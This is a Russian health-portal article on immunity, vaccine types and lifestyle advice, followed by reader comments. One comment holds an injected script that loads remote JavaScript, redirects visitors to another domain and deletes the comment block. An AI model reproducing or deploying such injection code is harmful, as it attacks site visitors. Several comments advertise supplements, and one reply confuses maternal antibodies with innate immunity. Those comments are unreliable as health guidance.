Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Как укрепить иммунитет  >>  Как укрепить иммунитет
 
Обратная связь
 

Как укрепить иммунитет

Размер шрифта
25 апреля 2012 10:00
  • google_analytics: false
  • Нравится

Иммунитет – это самостоятельная большая система организма, влияние на которую оказывает множество факторов. Поэтому, чтобы повысить защитные силы человека, нужно укреплять весь организм. Как это сделать?

Иммунитет: специфический и неспецифический

Различают два вида иммунитета: врожденный и приобретенный. За врожденный иммунитет отвечают биологические особенности организма человека. Именно от врожденного, или неспецифического, иммунитета зависит, что люди имеют разную устойчивость к одним и тем же заболеваниям. Под иммунитетом обычно подразумевают именно врожденную невосприимчивость к инфекционным заболеваниям.

Приобретенный, или специфический, иммунитет к той или иной болезни может формироваться на протяжении всей жизни человека. Этот вид иммунитета не передается по наследству. Для его выработки обычно используют разнообразные вакцины.

Факторы, ослабляющие иммунитет человека

Работу иммунной системы могут ослабить различные неблагоприятные факторы:

  • интоксикации;
  • яды и токсины;
  • загрязнения атмосферы;
  • хронические бактериальные, вирусные, грибковые инфекции;
  • переутомление;
  • стресс;
  • психические и физические перегрузки;
  • прием антибиотиков;
  • оперативное вмешательство;
  • кровопотеря, травмы, ожоги, переохлаждения;
  • некоторые заболевания, например сахарный диабет.

Когда иммунитет снижен у ребенка, это проявляется, в первую очередь, частыми простудными заболеваниями, такими как ОРВИ или грипп.

Повысить невосприимчивость организма к различным заболеваниям, можно воздействуя и на врожденный, и на приобретенный иммунитет.

Укрепление врожденного иммунитета

Неспецифический иммунитет можно укрепить путем увеличения общей сопротивляемости организма.

Для усиления защитных сил организма нужно:

  • избегать приема антибиотиков, кроме тех случаев, когда препарат назначен врачом;
  • правильно питаться, т.е. следить за тем, чтобы в рационе содержалось достаточное количество витаминов, минералов и аминокислот. Употребляйте больше зелени и овощей, кисломолочные продукты, морскую рыбу, оливковое масло;
  • исключить курение и злоупотребление алкоголя;
  • соблюдать режим дня;
  • заниматься физкультурой. Высокая физическая активность повышает защитные силы организма;
  • избегать стрессовых ситуаций
  • соблюдать правила гигиены.

Создание приобретенного иммунитета

Для выработки приобретенного (специфического) иммунитета против конкретного заболевания нужно провести вакцинацию. Во время вакцинации иммунитет формируется за счет введения ослабленного либо убитого (инактивированного) вируса, который не вызывает заболевания у здорового человека, но заставляет иммунную систему работать, избегая заболевания.

Виды вакцин

  1. Живая вакцина – препарат из ослабленного живого микроорганизма, потерявшего способность вызывать заболевание, но способного размножаться в организме и стимулировать иммунный ответ (реакцию иммунитета). К этой группе относятся вакцины против кори, краснухи, полиомиелита, гриппа и т.д.

  2. Инактивированная (убитая) вакцина – препарат, который содержит убитый патогенный микроорганизм – целиком или его части. Убивают возбудителя инфекции физическими методами (температура, радиация, ультрафиолетовый свет) или химическими (спирт, формальдегид). К группе инактивированных относятся вакцины против клещевого энцефалита, чумы, брюшного тифа, вирусного гепатита А, менингококковой инфекции.

  3. Химическая вакцина – препарат, который создается из антигенных компонентов, извлеченных из клетки микроба. К группе химических относятся вакцины против дифтерии, гепатита В, краснухи, коклюша.

  4. Рекомбинантная (векторная, биосинтетическая) вакцина – препарат, полученный методами генной инженерии, с помощью рекомбинантной технологии. Гены вирулентного микроорганизма, отвечающий за синтез защитных антигенов, встраивают в геном какого-либо безвредного микроорганизма (например, дрожжевую клетку), который продуцирует и накапливает соответствующий антиген. К группе рекомбинантных относятся вакцины против вирусного гепатита B, ротавирусной инфекции, вируса простого герпеса.

  5. Поливалентная (ассоциированная) вакцина содержит компоненты нескольких вакцин. К группе поливалентных относятся адсорбированная коклюшно-дифтерийно-столбнячная вакцина (АКДС-вакцина), тетравакцина (вакцины против брюшного тифа, паратифов А и В, а также столбнячный анатоксин) и АДС-вакцина (дифтерийно-столбнячный анатоксин).

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - helena

03 мая 2012 в 16:15

Цитировать   |   Пожаловаться

уважаемые модераторы медицинские, переведите, будьте любезны, на общедоступный русский в свете содержания вышенаписанной статьи (и поясните, есть ли все-таки врожденный иммунитет у ребенка) высказывание Малышевой : Если с рождения ребёнка эта кошкаживёт у вас, то ничё страшного может не быть для малыша, потому что онрождается с нулевым иммунитетом. Его иммунитет, формируясь в присутствии кошачьих аллергенов, может привыкнутьк ним. Но кошки живут меньше, чем люди. Если кошка умерла, был перерыв,и вы завели вторую кошку, вот тут может быть аллергия! И это тоже надопонимать! Поэтому говорить, "ну как же, у него ж не было аллергии на кошки, значит, не может быть!" Это не так!

helena 03 мая 2012 в 16:15
переведите, будьте любезны
Речь идет о т.н. "детях-аллергиках". У ребенка-аллергика не обязательно сформируется аллергический ответ на антигены кошки, если данная кошка присутствует в жизни ребенка с его рождения. Накопление антител к аллергену происходит медленно и не всегда приводит к реакции. 
При "смене" кошки такой ответ сформируется с бОльшей вероятностю, так как в крови ребенка, вполне вероятно, уже набран набор антител в нужном для формирования аллергического "ответа" количестве.  
Если с "первой" кошкой у малыша не было "конфликта", это не основание утверждать, что его не будет с последующими - вот резюме. 

3 - helena

04 мая 2012 в 16:09

Цитировать   |   Пожаловаться

А иммунитет с рождения все-же есть или нет? В одной из передач она уверяла, что с рождения - 99% иммунитета, и только 1% приобретается!

helena 04 мая 2012 в 16:09
А иммунитет с рождения все-же есть или нет?
 Да, врожденный иммунитет - это передача плоду или ребенку антител от матери через плаценту или в первые дни жизни с молозивом. Поэтому грудные дети не болеют инфекционными заболеваниями часто даже при контакте с инф. больными. К сожалению, этот иммунитет сохраняется недолго, около года.

5 - Kris

26 ноября 2012 в 10:09

Цитировать   |   Пожаловаться

Мой личный рецепт хорошего иммунитета - зарядка по утрам, хорошее настроение. обливание холодной водой, и, конечно, Леветон Форте. Он содержит полный комплекс витаминов и микроэлементов, наполняет тело энергией и помогает всегда быть в тонусе.

6 - Гость

25 сентября 2013 в 02:42

Цитировать   |   Пожаловаться

Работа иммунной системы больше, чем наполовину, зависит от работы желудочно-кишечного тракта. Рекомендуют молочнокислые продукты с большим содержанием бифидобактерий и других полезных, живых бактерий, но в магазинных продуктах их нет, или они напичканы антибиотиками, что опять таки подавляет полезную микрофлору кишечника и, как следствие, увеличивает нагрузку на иммунитет. Рекомендуют делать и пить натуральный кефир на основе тибетского 

Так же нужно кушать чеснок и репчатый лук - эти продукты умеют убивать вирусы, и не стоит забывать о яблоках, инжире, грецких орехах ...

7 - Гость

10 мая 2014 в 19:37

Цитировать   |   Пожаловаться

Не могу сказать что все поняла в этой статье. 

8 - Гость

27 апреля 2015 в 17:22

Цитировать   |   Пожаловаться

Не могу сказать, что поняла все о чем написано в этой статье.  У меня тоже были проблемы с иммунитетом после долгого курса лечения сильным препаратом. Мне врач посоветовал свечи Корилип и я до сих пор время от времени прохожу этот курс, мне очень помогает.

9 - zzzzzz

30 июня 2015 в 23:43

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

10 - Гость

27 июля 2015 в 11:25

Комментарий удален за нарушение Правил общения

1 | 2 Следующая

Статьи

       
Разрушители иммунитета. Что лишает вас защиты от болезней   Что можно приносить в больницу раковым больным   Как повысить иммунитет?   Двойной суперудар: еда для похудения, повышающая иммунитет!  
12 ноября 2012Старческие болезни больше не страшны 28 сентября 2012Наркоманов больше не будет!
 
22 августа 2012Иммунная система мешает побороть туберкулез! 14 августа 2012Средство от меланомы скрыто в нашем иммунитете!
 

Слайдшоу

1
7 признаков, что ваш иммунитет сдает! Как секс может улучшить жизнь
Как кормить грудью Все что нужно женщине. Часть 3
7 причин заниматься сексом больше Супереда для вашего иммунитета
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.